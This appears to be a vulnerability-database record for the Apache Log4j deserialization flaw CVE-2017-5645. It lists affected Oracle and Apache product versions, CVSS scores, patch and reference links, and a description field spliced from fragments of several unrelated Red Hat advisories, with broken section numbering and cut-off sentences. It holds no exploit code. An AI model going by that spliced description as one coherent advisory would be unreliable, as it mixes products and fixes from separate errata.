"retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail fiscal management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail eftlink", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0.3", }, { model: "retail eftlink", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.2", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.4", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "retail convenience and fuel pos", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.132", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail assortment planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0.1", }, { model: "retail assortment planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.3", }, { model: "retail assortment planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail advanced inventory planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail advanced inventory planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail advanced inventory planning", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "13.2", }, { model: "peoplesoft enterprise fin supply chain portal pack brazil", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "peoplesoft enterprise fin supply chain portal pack argentina", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "micros lucas", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.9.5", }, { model: "managed file transfer", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "managed file transfer", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2.0", }, { model: "managed file transfer", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jd edwards world security a9.4", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jd edwards world security a9.3", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jd edwards world security a9.2", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "flexcube private 
banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.4", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3", }, { model: "flexcube investor servicing", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "flexcube core banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.7", }, { model: "flexcube core banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.6", }, { model: "flexcube core banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.5", }, { model: "enterprise repository", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "enterprise repository", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise linux", scope: "eq", trust: 0.3, vendor: "oracle", version: "7", }, { model: "endeca server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.7", }, { model: "endeca information discovery integrator", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "endeca information discovery integrator", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "communications webrtc session controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications unified inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications unified inventory 
management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1", }, { model: "communications unified inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications services gatekeeper", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications services gatekeeper", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "communications network intelligence", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.1.1.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "communications interactive session recorder", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2", }, { model: "communications interactive session recorder", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1", }, { model: "communications interactive session recorder", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications convergent charging controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications converged application server service controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "-6.1", }, { model: "communications brm elastic charging engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "-7.5", }, { model: "business intelligence data warehouse administration console", scope: "eq", trust: 
0.3, vendor: "oracle", version: "11.1.1.6.4", }, { model: "big data discovery", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.6", }, { model: "autovue for agile product lifecycle management", scope: "eq", trust: 0.3, vendor: "oracle", version: "21.0.1", }, { model: "autovue for agile product lifecycle management", scope: "eq", trust: 0.3, vendor: "oracle", version: "21.0", }, { model: "application testing suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2.0.1", }, { model: "application testing suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.1", }, { model: "application testing suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.5.0.3", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.6", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.5", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.4", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.3", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.6", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile material and equipment management for pharmaceuticals", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile material and equipment management for pharmaceuticals", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.3", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.1", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2", }, { model: "agile engineering data management", scope: "eq", trust: 
0.3, vendor: "oracle", version: "6.1.3", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.8.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.6.2", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.6.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0.2", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.8", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.7", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.6", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.5", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.3", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.2", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.1", }, { model: "log4j 2.0-alpha1", scope: null, trust: 0.3, vendor: "apache", version: null, }, { model: "log4j rc2", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j rc1", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta9", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta8", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta7", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta6", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta5", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta4", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta3", scope: "eq", trust: 0.3, 
vendor: "apache", version: "2.0", }, { model: "log4j beta2", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta1", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j alpha2", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "communications webrtc session controller", scope: "ne", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications messaging server", scope: "ne", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "log4j", scope: "ne", trust: 0.3, vendor: "apache", version: "2.8.2", }, ], sources: [ { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:apache:log4j", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2017-003152", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat", sources: [ { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 0.8, }, cve: "CVE-2017-5645", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2017-5645", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.8, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-113848", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2017-5645", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, { attackComplexity: "Low", attackVector: "Network", author: "NVD", availabilityImpact: "High", baseScore: 9.8, baseSeverity: "Critical", confidentialityImpact: "High", exploitabilityScore: null, id: "CVE-2017-5645", impactScore: null, integrityImpact: "High", privilegesRequired: "None", scope: "Unchanged", trust: 0.8, userInteraction: "None", vectorString: 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2017-5645", trust: 1, value: "CRITICAL", }, { author: "NVD", id: "CVE-2017-5645", trust: 0.8, value: "Critical", }, { author: "VULHUB", id: "VHN-113848", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. Apache Log4j contains a vulnerability in the deserialization of untrusted data. An attacker may be able to obtain information, alter information, and disrupt service operation (DoS). Apache Log4j is prone to a remote code-execution vulnerability. \nSuccessfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application. Failed exploits will result in denial-of-service conditions. \nApache Log4j 2.0-alpha1 through 2.8.1 are vulnerable. Apache Log4j is a Java-based open source logging tool developed by the Apache Software Foundation. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. 
\n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 1 serves as a\nreplacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which\nare documented in the Release Notes document linked to in the References. (CVE-2017-5645)\n\n* A vulnerability was discovered in tomcat's handling of pipelined requests\nwhen \"Sendfile\" was used. If sendfile processing completed quickly, it was\npossible for the Processor to be added to the processor cache twice. This\ncould lead to invalid responses or information disclosure. (CVE-2017-5647)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat's\nDefaultServlet implementation. A crafted HTTP request could cause undesired\nside effects, possibly including the removal or replacement of the custom\nerror page. (CVE-2017-5664)\n\n* A vulnerability was discovered in tomcat. When running an untrusted\napplication under a SecurityManager it was possible, under some\ncircumstances, for that application to retain references to the request or\nresponse objects and thereby access and/or modify information associated\nwith another web application. (CVE-2017-5648)\n\n4. Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). Bugs fixed (https://bugzilla.redhat.com/):\n\n1441205 - CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used\n1441223 - CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n1459158 - CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism\n\n6. 
JIRA issues fixed (https://issues.jboss.org/):\n\nJWS-657 - tomcat-native installs RHEL apr in addition to jbcs-httpd24-httpd-libs\nJWS-667 - Subject incorrectly removed from user session\nJWS-695 - tomcat7_t and tomcat8_t domains are in unconfined_domain\nJWS-709 - RPM missing selinux-policy dependency\nJWS-716 - Backport 60087 for Tomcat 8\nJWS-717 - RFC 7230/3986 url requirement that prevents unencoded curly braces should be optional, since it breaks existing sites\nJWS-721 - CORS filter Vary header missing\nJWS-725 - /usr/share/tomcat7 needs world execute permissions to function on openshift v2\nJWS-741 - Configurations in conf.d are not applied\nJWS-760 - [ASF BZ 59961] Provide an option to enable/disable processing of Class-Path entry in a jar's manifest file\n\n7. The purpose of this text-only errata is to inform you about the\nsecurity issues fixed in this release. \n\nSecurity Fix(es):\n\n* bsh2: remote code execution via deserialization (CVE-2016-2510)\n\n* log4j: Socket receiver deserialization vulnerability (CVE-2017-5645)\n\n* uima: XML external entity expansion (XXE) can allow attackers to execute\narbitrary code (CVE-2017-15691)\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n\n* thrift: Improper Access Control grants access to files outside the\nwebservers docroot path (CVE-2018-11798)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nInstallation instructions are available from the Fuse 7.3.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1310647 - CVE-2016-2510 bsh2: remote code execution via deserialization\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n1572463 - CVE-2017-15691 uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1667188 - CVE-2018-11798 thrift: Improper Access Control grants access to files outside the webservers docroot path\n\n5. Description:\n\nRed Hat JBoss BPM Suite is a business rules and processes management system\nfor the management, storage, creation, modification, and deployment of\nJBoss rules and BPMN2-compliant business processes. (CVE-2017-5645)\n\n* It was found that XStream contains a vulnerability that allows a\nmaliciously crafted file to be parsed successfully which could cause an\napplication crash. The crash occurs if the file that is being fed into\nXStream input stream contains an instances of the primitive type 'void'. An\nattacker could use this flaw to create a denial of service on the target\nsystem. (CVE-2017-7957)\n\n3. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: log4j security update\nAdvisory ID: RHSA-2017:2423-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2017:2423\nIssue date: 2017-08-07\nCVE Names: CVE-2017-5645 \n=====================================================================\n\n1. 
Summary:\n\nAn update for log4j is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch\nRed Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch\nRed Hat Enterprise Linux Workstation (v. 7) - noarch\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch\n\n3. Description:\n\nLog4j is a tool to help the programmer output log statements to a variety\nof output targets. (CVE-2017-5645)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Server (v. 
7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-5645\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFZiCjVXlSAg2UNWIIRAgugAKCX6snTYMAdTmkK1uQ86MGQhkv7ugCdFILV\nuCPrjfU5EG2L7kIu/w1uCSA=\n=Fxz+\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThe eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss\nEnterprise Application Platform running on the Amazon Web Services (AWS)\nElastic Compute Cloud (EC2). (CVE-2017-5645)\n\n* A vulnerability was found in Jasypt that would allow an attacker to\nperform a timing attack on password hash comparison. (CVE-2014-9970)\n\n* It was found that an information disclosure flaw in Bouncy Castle could\nenable a local malicious application to gain access to user's private\ninformation. 
(CVE-2015-6644)\n\n* It was found that while parsing the SAML messages the StaxParserUtil\nclass of Picketlink replaces special strings for obtaining attribute values\nwith system property. This could allow an attacker to determine values of\nsystem properties at the attacked system by formatting the SAML request ID\nfield to be the chosen system property which could be obtained in the\n\"InResponseTo\" field in the response. (CVE-2017-2582)\n\n* It was found that when the security manager's reflective permissions,\nwhich allows it to access the private members of the class, are granted to\nHibernate Validator, a potential privilege escalation can occur. By\nallowing the calling code to access those private members without the\npermission an attacker may be able to validate an invalid instance and\naccess the private member value via ConstraintViolation#getInvalidValue(). JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-11487 - jboss-ec2-eap for EAP 7.0.8\n\n7. \n(CVE-2017-7525)\n\nRed Hat would like to thank Liao Xinxi (NSFOCUS) for reporting\nCVE-2017-7525", sources: [ { db: "NVD", id: "CVE-2017-5645", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "BID", id: "97702", }, { db: "VULHUB", id: "VHN-113848", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 2.7, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2017-5645", trust: 3, }, { db: "BID", id: "97702", trust: 1.4, }, { db: "OPENWALL", id: "OSS-SECURITY/2019/12/19/2", trust: 1.1, }, { db: "SECTRACK", id: "1041294", trust: 1.1, 
}, { db: "SECTRACK", id: "1040200", trust: 1.1, }, { db: "JVNDB", id: "JVNDB-2017-003152", trust: 0.8, }, { db: "PACKETSTORM", id: "144018", trust: 0.2, }, { db: "PACKETSTORM", id: "144013", trust: 0.2, }, { db: "PACKETSTORM", id: "143670", trust: 0.2, }, { db: "PACKETSTORM", id: "144597", trust: 0.2, }, { db: "PACKETSTORM", id: "143499", trust: 0.2, }, { db: "PACKETSTORM", id: "144019", trust: 0.2, }, { db: "PACKETSTORM", id: "145263", trust: 0.1, }, { db: "PACKETSTORM", id: "143500", trust: 0.1, }, { db: "PACKETSTORM", id: "144014", trust: 0.1, }, { db: "PACKETSTORM", id: "144017", trust: 0.1, }, { db: "PACKETSTORM", id: "144596", trust: 0.1, }, { db: "PACKETSTORM", id: "145262", trust: 0.1, }, { db: "PACKETSTORM", id: "142856", trust: 0.1, }, { db: "CNNVD", id: "CNNVD-201704-852", trust: 0.1, }, { db: "SEEBUG", id: "SSVID-92965", trust: 0.1, }, { db: "VULHUB", id: "VHN-113848", trust: 0.1, }, { db: "PACKETSTORM", id: "153344", trust: 0.1, }, { db: "PACKETSTORM", id: "144359", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, id: "VAR-201704-1589", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-113848", }, ], trust: 0.01, }, last_update_date: "2024-11-29T21:55:35.270000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "LOG4J2-1863", trust: 0.8, url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, ], sources: [ { db: "JVNDB", id: "JVNDB-2017-003152", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-502", trust: 1.9, }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 1.6, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5645", }, { trust: 1.4, url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { trust: 1.4, url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { trust: 1.4, url: 